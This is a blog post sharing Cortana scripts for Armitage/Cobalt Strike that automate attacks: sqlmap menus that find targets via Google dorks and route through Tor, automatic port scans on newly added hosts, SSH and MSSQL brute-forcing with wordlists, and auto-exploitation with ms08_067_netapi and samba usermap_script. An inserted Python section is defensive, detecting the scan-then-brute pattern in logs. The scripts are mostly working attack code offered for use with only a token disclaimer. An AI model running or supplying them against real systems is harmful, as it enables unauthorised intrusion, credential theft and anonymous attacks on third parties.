Friday, December 6, 2013

One Day with Cortana Script Engine - Cobalt Strike/Armitage


Today I worked a little with the Cobalt Strike 21-day demo.

A really great pentest tool, like Armitage: http://www.advancedpentest.com/

After some time I found the Script menu in Cobalt Strike, so let's google what we can do with the script engine.

After a while I found a great PDF document about the Cortana script engine. Download the PDF here: cortana_tutorial.pdf

Now let's play with it.

 

Cortana Script Engine Lesson 1
Custom Armitage Menu via Cortana scripts
# Contana-Info Sites Engine v0.1
# Contana Script Engine r0ckz.
# by cr4shyyy
# from http://security-is-just-an-illusion.blogspot.de

menubar("Web ToolKit", "webstuff", 2);

popup webstuff {
    menu "Info Sites" {
        item "Security is just an Illusion" {
            url_open("http://security-is-just-an-illusion.blogspot.de/");
        }
        item "TheHackerNews" {
            url_open("http://thehackernews.com/");
        }
        item "Securitytube" {
            url_open("http://www.securitytube.net");
        }
        item "Shodanhq" {
            url_open("http://www.shodanhq.com/");
        }
        item "Exploit-db" {
            url_open("http://www.exploit-db.com/");
        }
        item "1337day" {
            url_open("http://1337day.com/");
        }
        item "Privatepaste" {
            url_open("http://privatepaste.com/");
        }
        item "Hash-cracker.com" {
            url_open("http://www.hash-cracker.com/");
        }
        item "Rainbowtables.it64.com" {
            url_open("http://rainbowtables.it64.com/");
        }
        item "X-attack.net" {
            url_open("https://www.x-attack.net/?rtcrack");
        }
    }
}



Cortana Script Engine Lesson 2

Custom Armitage Tor Network Menu via Cortana scripts

# Contana-Tor Network Engine v0.1
# Contana Script Engine r0ckz.
# by cr4shyyy
# from http://security-is-just-an-illusion.blogspot.de


menubar("Web ToolKit", "webstuff", 2);

popup webstuff {
    menu "Tor Engine" {
        item "Start Tor" {
            println("\n----------------------------------------\n\c4Starting\c4 Tor-Network\nIP: \c9127.0.0.1:9050\c9 \n----------------------------------------");
            $console = console();
            $console = open_console_tab("Start Tor NetWork");
            cmd($console, "tor");
            #sleep(30 * 1000);
            db_sync();
        }
        item "Kill Tor" {
            println("\n----------------------------------------\n\c4Stop\c4 Tor-Network\nIP: \c9127.0.0.1:9050\c9 \n----------------------------------------");
            $console = console();
            $console = open_console_tab("Kill Tor NetWork");
            cmd($console, "killall tor");
            #sleep(30 * 1000);
            db_sync();
        }
        item "Restart Tor" {
            println("\n----------------------------------------\n\c4Restart\c4 Tor-Network\nIP: \c9127.0.0.1:9050\c9 \n----------------------------------------");
            $console = console();
            $console = open_console_tab("Restart Tor NetWork");
            cmd($console, "killall tor && tor");
            #sleep(30 * 1000);
            db_sync();
        }
    }
}



Cortana Script Engine Lesson 2

Custom Armitage Sqlmap Interface Menu via Cortana scripts

# Contana-Sqlmap Interface Engine v0.1
# Contana Script Engine r0ckz.
# by cr4shyyy
# from http://security-is-just-an-illusion.blogspot.de
# Change Gnome Profile to avoid terminal close after exploit

println("\n----------------------------------------\n\c4[*] Contana-Sqlmap Engine v0.1 Loaded [*] \n----------------------------------------");

menubar("Web ToolKit", "webstuff", 2);

popup webstuff {
    menu "Sqlmap" {
        item "Attack" {
            $ip = prompt_text("Target + option --dbs ?");
            if ($ip !is $null) {
                show_message("Lets Pwn The Box!");
                println("\n----------------------------------------\n\c4Attack\c4 with Sqlmap\nIP: \c9$ip\c9 \n----------------------------------------");
                $console = console();
                cmd($console, "gnome-terminal -x sqlmap --random-agent -u $ip ;bash");
                db_sync();
            }
        }
        item "Attack over Tor" {
            $ip = prompt_text("Target + option --dbs ?");
            if ($ip !is $null) {
                show_message("Lets Pwn The Box!");
                println("\n----------------------------------------\n\c4Attack\c4 with Sqlmap over Tor-Network\nIP: \c9$ip\c9 \n----------------------------------------");
                $console = console();
                cmd($console, "gnome-terminal -x sqlmap --random-agent --tor --tor-type=socks4 --tor-port=9050 -u $ip ;bash");
                db_sync();
            }
        }
        item "Attack with GDork" {
            $ip = prompt_text("Target + option --dbs inurl:gallery.php?id= ?");
            if ($ip !is $null) {
                show_message("Lets Pwn The Box!");
                println("\n----------------------------------------\n\c4Attack\c4 with Sqlmap with google Dorks\nIP: \c9$ip\c9 \n----------------------------------------");
                $console = console();
                cmd($console, "gnome-terminal -x sqlmap --random-agent -g $ip ;bash");
                db_sync();
            }
        }
        item "Attack with GDork over Tor" {
            $ip = prompt_text("Target + option --dbs inurl:gallery.php?id= ?");
            if ($ip !is $null) {
                show_message("Lets Pwn The Box!");
                println("\n----------------------------------------\n\c4Attack\c4 with Sqlmap with Google Dorks over Tor-Network\nIP: \c9$ip\c9 \n----------------------------------------");
                $console = console();
                cmd($console, "gnome-terminal -x sqlmap --random-agent --tor --tor-type=socks4 --tor-port=9050 -g $ip ;bash");
                db_sync();
            }
        }
        item "GDorks List" {
            url_open("http://pastebin.com/raw.php?i=QFhBYbPw");
        }
    }
}




Cortana Script Engine Lesson 3

Custom Armitage on Host add Auto TCP Port Quick Scan via Cortana scripts

# Contana-Quick-Scan Engine v0.1
# Contana Script Engine r0ckz.
# by cr4shyyy
# from http://security-is-just-an-illusion.blogspot.de

println("\n----------------------------------------\n\c4[*] Contana-Quick-Scan Engine v0.1 Loaded [*] \n----------------------------------------");

# Perform auto scan
on host_add {
    sleep(10 * 1000);
    println("\n----------------------------------------\n\c4[*] Scanning New Host \nIP : \c9$1\c9\n----------------------------------------");
    $console = console();
    #$console = open_console_tab("Scanning New Host");
    cmd($console, "use auxiliary/scanner/portscan/tcp");
    cmd($console, "set THREADS 100");
    cmd($console, "set PORTS 21, 22, 23, 25, 80, 110, 143, 443, 445, 1433, 3306, 4899, 5800, 5801, 8080");
    cmd($console, "set RHOSTS $1");
    cmd($console, "run -j");
    cmd($console, "use auxiliary/scanner/discovery/udp_sweep");
    cmd($console, "set THREADS 100");
    cmd($console, "set BATCHSIZE 256");
    cmd($console, "set RHOSTS $1");
    cmd($console, "run -j");
    #sleep(30 * 1000);
    db_sync();
}

on service_add_21 {
    println("\n----------------------------------------\n\c4[*] FTP-SERVER FOUND \nIP : \c9$1\c9\nPort : 21 Open\n----------------------------------------");
}

on service_add_22 {
    println("\n----------------------------------------\n\c4[*] SSH-SERVER FOUND \nIP : \c9$1\c9\nPort : 22 Open\n----------------------------------------");
}

on service_add_23 {
    println("\n----------------------------------------\n\c4[*] TELNET-SERVER FOUND \nIP : \c9$1\c9\nPort : 23 Open\n----------------------------------------");
}

on service_add_25 {
    println("\n----------------------------------------\n\c4[*] SMTP-SERVER FOUND \nIP : \c9$1\c9\nPort : 25 Open\n----------------------------------------");
}

on service_add_80 {
    println("\n----------------------------------------\n\c4[*] WEB-SERVER FOUND \nIP : \c9$1\c9\nPort : 80 Open\n----------------------------------------");
}

on service_add_110 {
    println("\n----------------------------------------\n\c4[*] POP3-SERVER FOUND \nIP : \c9$1\c9\nPort : 110 Open\n----------------------------------------");
}

on service_add_143 {
    println("\n----------------------------------------\n\c4[*] IMAP-SERVER FOUND \nIP : \c9$1\c9\nPort : 143 Open\n----------------------------------------");
}

on service_add_443 {
    println("\n----------------------------------------\n\c4[*] HTTPS-SERVER FOUND \nIP : \c9$1\c9\nPort : 443 Open\n----------------------------------------");
}

on service_add_445 {
    println("\n----------------------------------------\n\c4[*] MICROSOFT-DS-SERVER FOUND \nIP : \c9$1\c9\nPort : 445 Open\n----------------------------------------");
}

on service_add_1433 {
    println("\n----------------------------------------\n\c4[*] MS-SQL-SERVER FOUND \nIP : \c9$1\c9\nPort : 1433 Open\n----------------------------------------");
}

on service_add_3306 {
    println("\n----------------------------------------\n\c4[*] MYSQL-SERVER FOUND \nIP : \c9$1\c9\nPort : 3306 Open\n----------------------------------------");
}

on service_add_4899 {
    println("\n----------------------------------------\n\c4[*] RADMIN-SERVER FOUND \nIP : \c9$1\c9\nPort : 4899 Open\n----------------------------------------");
}

on service_add_5800 {
    println("\n----------------------------------------\n\c4[*] VNC-SERVER FOUND \nIP : \c9$1\c9\nPort : 5800 Open\n----------------------------------------");
}

on service_add_5801 {
    println("\n----------------------------------------\n\c4[*] VNC-SERVER FOUND \nIP : \c9$1\c9\nPort : 5801 Open\n----------------------------------------");
}

on service_add_8080 {
    println("\n----------------------------------------\n\c4[*] Shared-Service-SERVER FOUND \nIP : \c9$1\c9\nPort : 8080 Open\n----------------------------------------");
}
# EOF



Cortana Script Engine Lesson 4

Custom Armitage on Host add  &&  port 22  found Auto Bruteforce via Cortana scripts

# Brute New Host with SSH Server Ready on it.
# by http://security-is-just-an-illusion.blogspot.de/

# Perform auto msf port scan
# by monstream00

on host_add {
    sleep(10 * 1000);
    println("[*] msfScanning New Host TCP/UDP on $1");
    $console = console();
    #$console = open_console_tab("TCP/UDPscan_$1"); #Debug use
    cmd($console, "use auxiliary/scanner/portscan/tcp");
    cmd($console, "set THREADS 100");
    cmd($console, "set PORTS 21, 22, 80, 110, 143, 443, 445, 1433, 3306, 8080");
    cmd($console, "set RHOSTS $1");
    cmd($console, "run -j");
    cmd($console, "use auxiliary/scanner/discovery/udp_sweep");
    cmd($console, "set THREADS 100");
    cmd($console, "set BATCHSIZE 256");
    cmd($console, "set RHOSTS $1");
    cmd($console, "run -j");
    #sleep(30 * 1000);
    db_sync();
}


on service_add_22 {
    println("\n----------------------------------------\n\c4Attempting to bruteforce\c4 SSH-Server\nIP: \c9$1\c9 \n----------------------------------------");
    auxiliary("scanner/ssh/ssh_login", @($1), %(
        THREADS => '100',
        STOP_ON_SUCCESS => '1',
        USER_FILE => '/usr/share/metasploit-framework/data/wordlists/unix_users.txt',
        PASS_FILE => '/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt'));
}
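
Seen from the scanned host, the Lesson 3 and Lesson 4 scripts leave a recognisable sequence: a fast TCP sweep over a fixed port list, then SSH login failures from the same source. The Python below is an added example, not part of the original post, that flags that sequence in a host's own firewall and sshd logs; the log layouts, thresholds and sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# TCP ports the Lesson 3 script puts in PORTS for auxiliary/scanner/portscan/tcp.
SWEEP_PORTS = {21, 22, 23, 25, 80, 110, 143, 443, 445,
               1433, 3306, 4899, 5800, 5801, 8080}
MIN_PORTS = 8                   # distinct sweep ports per source (assumed threshold)
MIN_FAILS = 5                   # SSH failures after the sweep (assumed threshold)
WINDOW = timedelta(minutes=5)   # sweep duration / follow-up window (assumed)

STAMP = r"^(\w{3} +\d+ [\d:]{8}) "
FW = re.compile(STAMP + r".*SRC=(\S+) .*DPT=(\d+)")
SSH = re.compile(STAMP + r"\S+ sshd\[\d+\]: Failed password for .* from (\S+) port")

def parse_time(text, year=2013):
    # Syslog stamps carry no year; the caller supplies it.
    return datetime.strptime(f"{year} {text}", "%Y %b %d %H:%M:%S")

def find_scan_then_brute(lines):
    """Map each source IP to (sweep ports hit, SSH failures that followed)."""
    ports = defaultdict(dict)   # src -> {port: first time seen}
    fails = defaultdict(list)   # src -> [failure times]
    for line in lines:
        if m := FW.match(line):
            if int(m[3]) in SWEEP_PORTS:
                ports[m[2]].setdefault(int(m[3]), parse_time(m[1]))
        elif m := SSH.match(line):
            fails[m[2]].append(parse_time(m[1]))
    hits = {}
    for src, seen in ports.items():
        start, end = min(seen.values()), max(seen.values())
        if len(seen) < MIN_PORTS or end - start > WINDOW:
            continue
        after = [t for t in fails[src] if end <= t <= end + WINDOW]
        if len(after) >= MIN_FAILS:
            hits[src] = (len(seen), len(after))
    return hits

def sample_log():
    """Constructed lines: 192.0.2.10 sweeps then guesses; 192.0.2.20 is benign."""
    fw = ("Nov 26 18:40:{:02d} web1 kernel: IN=eth0 SRC={} "
          "DST=198.51.100.5 PROTO=TCP SPT=40000 DPT={}")
    ssh = ("Nov 26 18:41:{:02d} web1 sshd[811]: "
           "Failed password for root from {} port 40100 ssh2")
    lines = [fw.format(i, "192.0.2.10", p) for i, p in enumerate(sorted(SWEEP_PORTS))]
    lines += [ssh.format(i, "192.0.2.10") for i in range(6)]
    lines += [fw.format(30, "192.0.2.20", 443), ssh.format(40, "192.0.2.20")]
    return lines
```

Calling `find_scan_then_brute(sample_log())` reports only the sweeping source; a source that touches one port and mistypes a password once stays below both thresholds.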



Brute New Host with MSSQL Server Ready on it

# Brute New Host with MSSQL Server Ready on it.
# by http://security-is-just-an-illusion.blogspot.de/

on service_add_1433 {
    println("Attempting to brute force MSSQL-Server |$1|");
    auxiliary("scanner/mssql/mssql_login", @($1), %(
        USER_FILE => '/opt/framework3/msf3/data/wordlists/unix_users.txt',
        PASS_FILE => '/opt/framework3/msf3/data/wordlists/unix_passwords.txt'));
}

Cortana Script Engine Lesson 4

Custom Armitage on Host add Auto Exploit via Cortana scripts

# Exploit New Host with microsoft-ds samba with the ms08_067_netapi exploit.
# by http://security-is-just-an-illusion.blogspot.de/

on service_add_445 {
    println("[*]Exploiting $1 with ms08_067_netapi sploit (" . host_os($1) . ")");
    if (host_os($1) eq "Microsoft Windows") {
        exploit("windows/smb/ms08_067_netapi", $1);
    }
    else {
        exploit("multi/samba/usermap_script", $1, $null, $null, 1);
    }
}

Now have fun with the Cortana Script Engine ;)

166 comments:

  1. Awesome, why not upload your scripts to the Cortana GitHub repository? It will be more useful. :-D

  2. Thanks Beny Green ;)
    Feel free to upload it to GitHub; all information is open-source here.
    Don't have a git account atm.

[#] iNFO [#]

All the information provided on this site is for educational purposes only.
 
The site and its author are in no way responsible for any misuse of the information.